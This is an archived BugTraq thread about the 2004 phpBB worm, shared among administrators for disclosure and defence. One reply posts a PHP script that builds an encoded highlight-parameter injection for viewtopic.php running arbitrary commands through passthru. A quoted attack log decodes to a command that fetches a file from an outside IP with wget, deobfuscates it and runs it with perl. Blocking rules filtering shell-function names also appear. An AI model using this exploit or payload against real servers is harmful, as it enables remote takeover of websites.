BugTraq
phpBB Worm Dec 20 2004 11:51PM
Shannon Lee (shannon webhostworks net) (3 replies)
Re: phpBB Worm Dec 22 2004 03:21PM
Alexander Klimov (alserkli inbox ru)
Re: phpBB Worm Dec 21 2004 10:28PM
Raymond Dijkxhoorn (raymond prolocation net) (2 replies)
Re: phpBB Worm Dec 23 2004 12:59PM
Anders Henke (anders schlund de)
Re: phpBB Worm Dec 22 2004 11:22AM
Sebastian Wiesinger (bofh fire-world de) (1 replies)
Re: phpBB Worm Dec 22 2004 11:34PM
William Geoghegan (w geoghegan geotekcs co uk)
A script to check if your phpBB is vulnerable.
Anything below 2.0.11 _probably_ is but incase your not sure, use this
script.

The script generates the request parameters, all you need to do is copy the
result onto www.thesite.com/viewtopic.php

<?
$rush='ls -al'; //do what
$highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch

print "?t=%37&rush=";

for ($i=0; $i<strlen($rush); ++$i) {
print '%' . bin2hex(substr($rush,$i,1));
}

print "&highlight=%2527.";

for ($i=0; $i<strlen($highlight); ++$i) {
prt '%' . bin2hex(substr($highlight,$i,1));
}

print ".%2527";
?>

Cheers.

William Geoghegan

GEOTEK Computer Services
- www.geotekcs.co.uk -

----- Original Message -----
From: "Sebastian Wiesinger" <bofh (at) fire-world (dot) de [email concealed]>
To: <bugtraq (at) securityfocus (dot) com [email concealed]>
Sent: Wednesday, December 22, 2004 11:22 AM
Subject: Re: phpBB Worm

>* Raymond Dijkxhoorn <raymond (at) prolocation (dot) net [email concealed]> [2004-12-22 00:06]:
>> If you cannot fix it (virtual servers) fast for all your clients you
>> could
>> also try with something like this:
>>
>> RewriteEngine On
>> RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
>> RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
>> RewriteRule ^.*$ -
>> [F]
>>
>> We had some vhosts where this worked just fine. On our systems we didnt
>> see any valid request with echr and esystem, just be gentle with it, it
>> works for me, it could work for you ;)
>
> If you use mod_security, this may help, too:
>
> SecFilterSelective "THE_REQUEST"
> "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("
>
> I had another exploit attempt, with this payload:
>
> 66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET
> /forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%
20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31%33%
37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D%70%65%
20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%69%65%61%
2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68%6D%2F%20%
2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A%2E%70%6C%20%
62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%7
3%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7
3%68%5D%29.%2527
> HTTP/1.1" 200 12266 "-" "-"
>
> Which decodes to:
>
> rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe
> y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl
> b0t*; echo _END_
> highlight='.passthru($HTTP_GET_VARS[rush]).'
>
> Regards,
>
> Sebastian
>
> --
> GPG Key-ID: 0x76B79F20 (0x1B6034F476B79F20)
> Wehret den Anfaengen: http://odem.org/informationsfreiheit/
> Thunder rolled. ... It rolled a six.
> --Terry Pratchett, Guards! Guards!
>
>
> --
> No virus found in this incoming message.
> Checked by AVG Anti-Virus.
> Version: 7.0.298 / Virus Database: 265.6.4 - Release Date: 22/12/2004
>
>

[ reply ]
RE: phpBB Worm Dec 21 2004 08:11PM
Paul Kurczaba (paul myipis com)


 

Privacy Statement
Copyright 2010, SecurityFocus